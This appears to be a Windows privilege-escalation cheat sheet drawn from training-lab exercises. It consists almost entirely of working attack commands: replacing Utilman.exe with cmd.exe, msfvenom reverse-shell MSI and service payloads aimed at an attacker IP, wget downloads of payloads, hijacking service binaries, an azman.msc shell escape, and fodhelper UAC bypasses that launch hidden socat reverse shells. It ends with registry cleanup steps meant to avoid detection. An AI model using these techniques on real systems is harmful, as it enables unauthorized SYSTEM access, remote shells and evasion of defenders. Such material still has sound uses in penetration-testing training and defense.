Escalation

Utilman.exe

Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen

Since Utilman is run with SYSTEM privileges, we will effectively gain SYSTEM privileges if we replace the original binary for any payload we like. As we can take ownership of any file, replacing it is trivial.

1. Start by taking ownership with the following command

C:\> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership".

Being the owner of a file doesn't mean that you have privileges over it, but you can assign yourself any privileges you need.

2. Give your user full permissions over utilman.exe you with the following command

C:\> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: Utilman.exe
Successfully processed 1 files; Failed processing 0 files

3. Replace utilman.exe with a copy of cmd.exe

C:\Windows\System32\> copy cmd.exe utilman.exe
        1 file(s) copied.

4. Lock the screen from the start menu, and click on the "Ease of Access" button

Since we replaced utilman.exe with a copy of cmd.exe, we will get a command prompt with SYSTEM privileges.

AlwaysInstallElevated

Windows installer files (.msi) are used to install applications on the system and they usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account and could potentially allow us to generate a malicious MSI file that would run with admin privileges.

This method requires two registry values to be set. You can query these from the command line using the commands below.

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Both need to be set, otherwise exploitation will not be possible.

You can generate a malicious .msi file using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

Once you have transferred the file you have created, you can run the installer with the command below

C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Windows Services

If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially.

1. Query the service configuration using sc

C:\> sc qc WindowsScheduler 

2. Proceed to check the permissions on the executable:

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe

3. Generate an exe-service payload using msfvenom and serve it through a python webserver:

user@attackerpc$msfvenom -pwindows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445-fexe-service -orev-svc.exe

We can then pull the payload from Powershell with the following command:

wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

Once the payload is in the Windows server, we proceed to replace the service executable with our payload.

C:\> cd C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
        1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> move C:\Users\unpriviledged\rev-svc.exe WService.exe
        1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> icacls WService.exe /grant Everyone:F
        Successfully processed 1 files.

Finally, execute.

C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler

AutoElevate

Some executables can auto-elevate without any user intervention. This applies to most of the Control Panel's functionality and some executables provided with Windows. For an application to auto-elevate:

• The executable must be signed by the Windows Publisher
• The executable must be contained in a trusted directory, like %SystemRoot%/System32/ or %ProgramFiles%/

Executable files (.exe) must declare the autoElevate element inside their manifests. To check a file's manifest, we can use sigcheck, a tool provided as part of the Sysinternals suite.

azman.msc

Open the Run prompt, type "azman.msc" and press OK. This will be spawned from the mmc.exe process with elevated privileges.

To open a shell, we will abuse the application's help feature.

1. In the navigation menu, select Help > Help Topics
2. Right click anywhere on the help article and select View Source

This will spawn a notepad process that we can leverage to get a shell. Go to File > Open, select All Files in the dropdown, and go to C:\Windows\System32 and search for cmd.exe.

Right-click and select Open. You will now have a command prompt opened with elevated access!

Fodhelper

Check to see if your user is part of the Administrators group and that it is running with a medium integrity token

C:\Windows\system32>whoami
myserver\attacker
C:\Windows\system32>net user attacker | find "Local Group"
Local Group Memberships      *Administrators       *Users                
C:\Windows\system32>whoami /groups | find "Label"
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

We set the required registry values to associate the ms-settings class to a reverse shell

C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes"
C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.
C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.
 
C:\> fodhelper.exe

And another technique...

C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes"
 
C:\> reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f 
The operation completed successfully.
 
C:\> reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f 
The operation completed successfully. 
 
C:\> fodhelper.exe

To avoid detection, we need to clean up after ourselves with the following commands:

reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f

Popular Tools

WinPEAS

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts.

• https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS

PrivescCheck

This script aims to identify Local Privilege Escalation (LPE) vulnerabilities that are usually due to Windows configuration issues, or bad practices. It can also gather useful information for some exploitation and post-exploitation tasks.

• https://github.com/itm4n/PrivescCheck

WES-NG

WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities.

• https://github.com/bitsadmin/wesng